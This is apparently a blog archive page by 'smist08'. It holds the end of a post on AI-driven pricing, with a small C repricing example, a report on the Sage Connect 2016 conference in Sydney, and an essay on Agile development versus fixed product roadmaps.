Setting prices is an art and a science. You need to lower prices to move slow moving items out of inventory, and try to keep prices high to maximize return. You need to be aware of competitors’ prices and watch for their items going on sale. Algorithms can greatly help with this. Amazon is a master of it, maintaining millions of prices with AI all over their web site. Algorithms can scan the web for competitive pricing, watch inventory levels and item costs, and know where we are in a quarter and how much we need to stimulate sales to meet targets. These algorithms can make all the trade-offs between relying on customer loyalty and having to be the low cost option, and the same applies to customer and volume discounts. Once you have a lot of items for sale, maintaining prices is a lot of work, especially in the world of online shopping where everything changes so dynamically. With the big guys like Amazon and Walmart using these algorithms so effectively, you need to as well to be competitive.
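A tiny sketch of the flavor of rule such an engine applies (all the thresholds are invented; a real repricer weighs many more signals and learns them rather than hard-coding them):

/* Toy repricing rule: undercut the lowest competitor slightly,
   discount slow movers further, but never go below cost plus a
   minimum margin. */
double suggest_price(double cost, double lowest_competitor_price,
                     int days_in_stock) {
    double floor = cost * 1.10;                    /* assumed 10% minimum margin */
    double price = lowest_competitor_price * 0.99; /* undercut by 1% */
    if (days_in_stock > 90)                        /* slow mover: move it out */
        price *= 0.95;
    return price > floor ? price : floor;
}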

Summary

This article just gave a few examples of the many places we’ll be seeing AI and Machine Learning algorithms becoming integrated into all our Business Applications. The examples in this article are all possible today and in use individually by large corporations. The cost of all these technologies is coming down and we are seeing these become integrated into lower cost Business Applications for small and medium sized businesses.

As these become adopted by more and more companies, it will become a competitive necessity to adopt them or risk becoming uncompetitive in the fast paced online world. There will still be a human element to monitor and provide policies, but humans can’t perform many of these tasks at the speed and scale that today’s world requires.

For the users of Business Applications, the addition of AI to the user interactions should make these applications much more pleasant to operate. Instead of gotchas there will be helpful suggestions and reminders. Instead of needing to memorize and look up all sorts of codes, these will be usefully provided wherever necessary. I think this transition will be as big as the transition we made from text based applications to GUI applications, but in this case I think the real ROI will be much higher.

 

Written by smist08

July 26, 2017 at 2:03 am

Sage Connect 2016


Introduction

The Sage Connect 2016 conference has just wrapped up in Sydney, Australia. I was very happy to be able to head over there, give a one-day training class on our new Web UIs SDK, and then give a few sessions in the main conference. This year the conference combined all the Sage Australia/New Zealand/Pacific Islands products into one show, so there were customers and partners from Sage HandiSoft, Sage MicrOpay, Sage One as well as the usual people from Sage CRM, Sage 300, Sage CRE and Sage X3.

The show ran for two days: the first day was for customers and partners, and the second day was for partners only. The first day had around 600 people in attendance. There was a networking event for everyone at the end of the first day, and a gala awards dinner for the partners after the second day.

A notable part of the keynote was the kick-off of the Sage Foundation in Australia with a sponsorship of Orange Sky Laundry. Certainly a worthwhile cause that is doing a lot of good work helping Australia’s homeless population.

There was a leadership forum featuring three prominent Australian entrepreneurs discussing their careers and providing advice based on their experience. These were Naomi Simpson of Red Balloon, Brad Smith of Braaap Motorcycles and Steve Vamos of Telstra. I found Brad Smith especially interesting as he created a motorcycle manufacturer from scratch.

The event was held at the conference center at the Australian Technology Park. This was very interesting since it was converted from the Eveleigh Railway Workshops and still contains many exhibits and equipment from that era. It created an interesting contrast of 2016 era high tech to the heavy industry that was high tech around 1900.

Sage 300

The big news for Sage 300 was the continued roll out of our Web UIs. The Sage 300 2016.1 release, just being rolled out, adds the I/C, O/E and P/O screens along with quite a few other screens and enhancements. Jaqueline Li, the Product Manager for Sage 300, was also at the show and presented the roadmap for what customers and partners can expect in the next release.

Sage is big on promoting the golden triangle of Accounting, Payments and Payroll. In Australia this is represented by Sage 300, Sage Payment Solutions and Sage MicrOpay, which all integrate to complete the triangle for customers. Sage Payment Solutions (SPS) is the same one as in North America, and now operates in the USA, Canada and Australia.

Don Thomson, one of the original founders of Accpac and the developer of the Access-C compiler, was present representing his current venture TaiRox. Here he is being interviewed by Mike Lorge, the Managing Director of Sage Business Solutions, on the direction of Sage 300 during one of the keynote sessions.

[Photo: Don Thomson interviewed by Mike Lorge]

Development Partners

Sage 300 has a large community of ISVs that provide specialized vertical Accounting modules, reporting tools, utilities and customized solutions. These solutions have been instrumental in making Sage 300 a successful product and a successful platform for business applications. Without these companies’ relentless, passionate support, Sage 300 wouldn’t have anywhere near the market share it has today.

There were quite a few exhibiting at the Connect conference as well as providing pre-conference training and conference sessions. Some of the participants were: Altec, Accu-Dart, AutoSimply, BSP Software, Dingosoft, Enabling, Greytrix, HighJump, InfoCentral, Orchid, Pacific Technologies, Symphony, TaiRox and Technisoft.

[Photo: exhibitors at the Connect conference]

I gave a pre-conference SDK training class on our new Web UIs, so hopefully we will be seeing some Web versions of these products shortly.

Summary

It’s a long flight from Vancouver to Sydney, but at least it’s a direct flight. The time zone difference is 19 hours ahead, so it feels like 5 hours back, which isn’t too bad. Going from Canadian winter to Australian summer is always enjoyable, getting some sunshine and feeling the warmth. Sydney was hopping, with tourist season in full swing, multiple cruise ships docked in the harbor, Chinese new year celebrations underway and all sorts of other events going on.

The conference went really well, and was exciting and energizing. Hopefully everyone learned something and became more excited about what we have today and what is coming down the road.

Of course you can’t visit Australia without going to the beach, so here is one last photo, in this case of Bondi Beach. Surf’s up!

[Photo: Bondi Beach]

Written by smist08

February 25, 2016 at 2:46 am

Agile Vs Roadmap


Introduction

We often receive RFPs (Requests for Proposals) that demand a firm, committed five year product roadmap. Similarly, we are often criticized for not having such a “golden” roadmap when other competing products have one. Having worked in an Agile world for some time now, I find these requests stranger and stranger.

The quibble here isn’t with having a plan, it’s with the inflexibility these requests imply: that a company needs to set its course for five years and then any change in that plan is somehow a failure to deliver; that as knowledge and circumstances change you need to stick to the plan and not adapt to the new situation.

Products are now introduced in “Internet” time. This means they are updated far more frequently (sometimes several times a day). All companies are looking to be “disruptive” and to “redefine” their market. Under these fast moving and fast changing conditions does it make sense to have a fixed long term roadmap?

On the other hand a product needs direction. A product needs long term thinking. You need to decide when to do something quick and dirty versus laying more groundwork and infrastructure to support future features. Stakeholders need to have an idea where a product is developing and what might be coming down the road.

There are quite a few types of roadmaps: technology roadmaps, feature roadmaps, release roadmaps, stop list roadmaps, marketing and strategy roadmaps, and many others. This article generally applies to any of these.


Waste Not, Want Not

One of the key tenets of Agile Development is to reduce, and if possible eliminate, waste. Waste is any extra work performed by teammates that doesn’t directly add value during the agile sprints. One main source of waste is doing too much and too detailed estimating. If you want a team to commit to estimates, then they have to spend a lot of time working through those estimates so that they have the necessary precision. However, this work is often just waste: the work isn’t done due to changing priorities, or another team does the work and insists on repeating the process, or the project is postponed and by the time it’s resumed things have changed.

Roadmaps tend to generate a lot of wasted work. Once a company wants a roadmap that everyone is committed to, far too much time will be spent working on the estimates. The trick here is to be willing to accept inaccurate estimates. Many studies have shown that WAG (Wild-Ass Guess) type estimates aren’t really any less accurate than carefully constructed ones. All you need to know for building a roadmap is the order of magnitude of an item, not the details.

Detailed estimates are only done when the stories are going to be performed by the agile team. This work usually happens as a part of backlog grooming in the sprint before the work is actually going to be done. This then ensures that the stories are properly broken down and that the work can fit into one sprint.

Accept the Roadmap as a Guideline

The best way to think of a roadmap is as a guideline for current thinking. It is a mechanism to elicit feedback which can then be used to produce a better roadmap. Publishing a roadmap as a “fait accompli” doesn’t serve nearly as well as using a roadmap as a starting point for a conversation.

Often getting customer feedback on direction without providing any context or ideas is quite difficult because customers don’t spend their time thinking about how you need to develop your product. With a roadmap they can see how your product will fit in (or not) with their future business directions. Then they can provide useful feedback on what will be useful, what will be irrelevant and what will actually be harmful.

Keep in mind that conversations are two way things and the only way to be successful is to incorporate the feedback received and to show that the time spent by the customer talking to you is worthwhile. Corporations that can incorporate and synthesize the feedback from hundreds of customers in an effective manner tend to be the companies that really shine.


Accept that Agile Works

A lot of times the push for a fixed roadmap is a result of the organization outside of R&D not being comfortable with the Agile idea of working on the most important story all the time. They liked the old days where a giant requirements document was produced and upper level management reviewed this and then felt comfortable that they could let R&D go off for a year or two to work on this without paying any more attention.

Generally it’s proven out that Agile is much more efficient and produces better products that meet customers’ needs much better than the old waterfall execute-the-requirements approach. But if upper management wants to know what R&D is doing, they have to pay attention, since things are fluid and always changing. This can be hard to accept, but it’s now being found that Agile can be applied to other parts of the organization. Rather than older parts of the company dragging down the Agile parts, all departments are going to Agile, and it’s working very well for modern companies. In fact, many people now believe that if a company doesn’t make this transition it will become less and less competitive. The sad part is that Agile produces far better artifacts showing the progress of a project; you just need to learn how to use the tracking software to see them (another source of waste is producing specialized reports just for upper management consumption).

Customer Connectedness

In the end, the goal is to be as customer connected as possible, always working on the item in the product backlog with the highest value for the customer. This is now a proven principle for success. Dictating to customers what is good for them will just alienate your customers and send them elsewhere.

Creating a general roadmap that is used to get customer feedback and buy-in is just one tool of many to being a better customer connected company. And again the key secret ingredient is always adapting to change and not becoming fixed in your direction.

Of course when talking to customers, and often other stakeholders, they will start out with how they need everything yesterday. But you have to steer the conversation toward choosing priorities, and not be browbeaten into accepting that the estimates need to be shorter.

Summary

Roadmaps are great tools for having a conversation with stakeholders on the direction of a product. You just have to be careful not to fall into the trap that the roadmap is somehow a commitment that can never change. If done properly it can serve quite a few goals that are fully compatible with an Agile methodology.

If you are presenting a roadmap at a conference or over WebEx, always preface the presentation by saying that this is our current thinking and that we are always looking for feedback and ways to make the roadmap better.

 

Written by smist08

October 28, 2015 at 8:05 pm